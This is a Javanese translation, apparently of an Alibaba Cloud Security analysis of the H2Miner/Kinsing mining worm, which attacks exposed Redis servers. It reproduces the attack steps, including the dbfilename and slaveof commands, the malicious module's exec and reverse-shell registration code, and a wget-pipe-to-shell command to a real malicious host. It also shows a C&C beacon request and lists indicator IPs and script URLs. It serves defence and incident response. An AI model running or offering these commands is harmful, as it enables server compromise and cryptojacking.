Sedina kepungkur, salah sawijining server proyekku diserang dening cacing sing padha. Kanggo nggoleki jawaban kanggo pitakonan "Apa iku?" Aku nemokake artikel sing apik dening tim Alibaba Cloud Security. Amarga aku ora nemokake artikel iki ing Habré, aku mutusake nerjemahake khusus kanggo sampeyan <3
entri
Bubar, tim keamanan Alibaba Cloud nemokake wabah H2Miner. Jenis cacing jahat iki nggunakake kekurangan wewenang utawa tembung sandhi sing lemah kanggo Redis minangka gateway menyang sistem sampeyan, sawise iku nyinkronake modul angkoro dhewe karo budak liwat sinkronisasi master-budak lan pungkasane ndownload modul angkoro iki menyang mesin sing diserang lan nglakokake angkoro. instruksi.
Ing jaman biyen, serangan ing sistem sampeyan utamane ditindakake kanthi nggunakake metode sing nglibatake tugas sing dijadwal utawa kunci SSH sing ditulis ing mesin sampeyan sawise panyerang mlebu menyang Redis. Untunge, cara iki ora bisa digunakake asring amarga masalah karo kontrol ijin utawa amarga versi sistem sing beda. Nanging, cara iki ngemot modul angkoro bisa langsung nglakokake perintah penyerang utawa entuk akses menyang cangkang, sing mbebayani kanggo sistem sampeyan.
Amarga akeh server Redis sing di-host ing Internet (meh 1 yuta), tim keamanan Alibaba Cloud, minangka pangeling sing ramah, nyaranake supaya pangguna ora nuduhake Redis kanthi online lan mriksa kanthi rutin kekuwatan sandhi lan manawa ana kompromi. pilihan cepet.
H2 Panambang
H2Miner minangka botnet pertambangan kanggo sistem basis Linux sing bisa nyerang sistem sampeyan kanthi macem-macem cara, kalebu kekurangan wewenang ing benang Hadoop, Docker, lan kerentanan eksekusi perintah remot (RCE) Redis. Botnet dianggo kanthi ndownload skrip lan malware kanggo mine data sampeyan, nggedhekake serangan kanthi horisontal, lan njaga komunikasi komando lan kontrol (C&C).
Redis RCE
Kawruh babagan subyek iki dituduhake dening Pavel Toporkov ing ZeroNights 2018. Sawise versi 4.0, Redis ndhukung fitur plug-in loading sing menehi pangguna kemampuan kanggo mbukak file supaya file sing dikompilasi karo C menyang Redis kanggo nglakokake perintah Redis tartamtu. Fungsi iki, sanajan migunani, ngemot kerentanan, ing mode master-slave, file bisa disinkronake karo budak liwat mode fullresync. Iki bisa digunakake dening panyerang kanggo nransfer file jahat. Sawise transfer rampung, panyerang mbukak modul kasebut menyang instance Redis sing diserang lan nglakokake perintah apa wae.
Analisis Cacing Malware
Bubar, tim keamanan Alibaba Cloud nemokake manawa ukuran klompok penambang angkoro H2Miner dumadakan tambah akeh. Miturut analisis, proses umum kedadeyan serangan kaya ing ngisor iki:
H2Miner nggunakake RCE Redis kanggo serangan lengkap. Penyerang pisanan nyerang server utawa server Redis sing ora dilindhungi kanthi tembung sandhi sing lemah.
Banjur padha nggunakake printah config set dbfilename red2.so kanggo ngganti jeneng berkas. Sawise iki, panyerang nglakokake perintah kasebut slaveof kanggo nyetel alamat host replikasi master-slave.
Nalika instance Redis sing diserang nggawe sambungan master-slave karo Redis angkoro sing diduweni dening penyerang, panyerang ngirim modul sing kena infeksi nggunakake perintah fullresync kanggo nyinkronake file kasebut. File red2.so banjur bakal diundhuh menyang mesin sing diserang. Penyerang banjur nggunakake modul loading ./red2.so kanggo mbukak file iki. Modul kasebut bisa nglakokake perintah saka panyerang utawa miwiti sambungan mbalikke (lawang mburi) kanggo entuk akses menyang mesin sing diserang.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Sawise nglakokake prentah sing ala kayata / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, penyerang bakal ngreset jeneng file serep lan mbongkar modul sistem kanggo ngresiki jejak. Nanging, file red2.so isih tetep ana ing mesin sing diserang. Pangguna disaranake kanggo menehi perhatian marang anané file sing curiga ing folder conto Redis.
Saliyane mateni sawetara proses ala kanggo nyolong sumber daya, panyerang ngetutake skrip jahat kanthi ngundhuh lan nglakokake file binar sing mbebayani kanggo . Iki tegese jeneng proses utawa jeneng direktori sing ngemot kinsing ing host bisa nuduhake yen mesin kasebut wis kena infeksi virus iki.
Miturut asil reverse engineering, malware utamane nindakake fungsi ing ngisor iki:
- Ngunggah file lan ngeksekusi
- Mining
- Njaga komunikasi C&C lan nglakokake perintah penyerang
Gunakake masscan kanggo mindhai eksternal kanggo nggedhekake pengaruh sampeyan. Kajaba iku, alamat IP saka server C&C hard-kode ing program, lan host sing diserang bakal komunikasi karo server komunikasi C&C nggunakake panjalukan HTTP, ngendi informasi zombie (server kompromi) diidentifikasi ing header HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Cara serangan liyane
Alamat lan pranala sing digunakake dening cacing
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Kaping pisanan, Redis ora bisa diakses saka Internet lan kudu direksa nganggo sandhi sing kuwat. Sampeyan uga penting yen klien mriksa yen ora ana file red2.so ing direktori Redis lan ora ana "kinsing" ing file / jeneng proses ing host.
Source: www.habr.com